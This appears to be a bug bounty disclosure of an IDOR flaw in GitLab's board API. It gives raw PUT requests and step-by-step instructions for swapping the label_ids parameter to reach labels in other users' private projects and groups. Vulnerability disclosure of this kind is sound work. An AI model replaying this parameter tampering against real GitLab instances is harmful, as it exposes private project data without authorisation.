Add and Access to Labels of any Private Projects/Groups of Gitlab(IDOR)

**Summary & Description : If you have a private project or private group then no non member should be able to access any information.But Adding Labels in your Private boards API request is vulnerable to IDOR attack which is leading to add private group/project labels and access it. ##Vulnerable Request for Project : ``` PUT /[username]/[project_name]/boards/[board_id].json HTTP/1.1 Host: gitlab.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 Content-Length: 178 Connection: close Cookie: [Cookies] {"board":{"id":857058,"name":"Development","labels":[{"id":,"title":"","color":"#428BCA"}],"milestone_id":null,"assignee":{},"weight":null,"label_ids":[[Label_ID]]}} ``` Vulnerable parameter : label_ids : Label_ID ##Vulnerable Request for Group : ``` PUT /groups/vijaykumar007Publicgroup/-/boards/848604.json HTTP/1.1 Host: gitlab.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 Content-Length: 186 Connection: close Cookie: [Cookies] {"board":{"id":848604,"name":"Developmenthacked","labels":[{"id":,"title":"","color":"#F0AD4E"}],"milestone_id":null,"assignee":{},"weight":null,"label_ids":[label_ID]}} ``` Vulnerable labelID : label_ids ## Steps To Reproduce: Take 2 different accounts to reproduce this issue.Also I am taking Project for reproduction. 1.Login from Victim account and create a project. 2.Make the project private, don't add any member and try to remove all the public permission so it doesn't mixup any permissions. 3.Create a new label.(Victim_label,ID:12345) 4.Now login from Attacker account and try to access the victim project. 5.You will notice that you are not able to victim project. 6.Now create a new project and go to labels. 7.Create a new label and go to boards. 8.Edit the Board and you will see label section. 9.Add label into the board and intercept the save request. 10.The request would look something like above mentioned request. 11.Change the labelID parameter to victim_label_ID in parameter "label_ids" and send the request. 12.You will notice that the private label will be added into the board and you will be able to access it. Same you can apply on Private groups too. ## Supporting Material/References: * List any additional material (e.g. screenshots, logs, etc.) ## Impact Add and Access to Labels of any Private Projects/Groups of Gitlab(IDOR)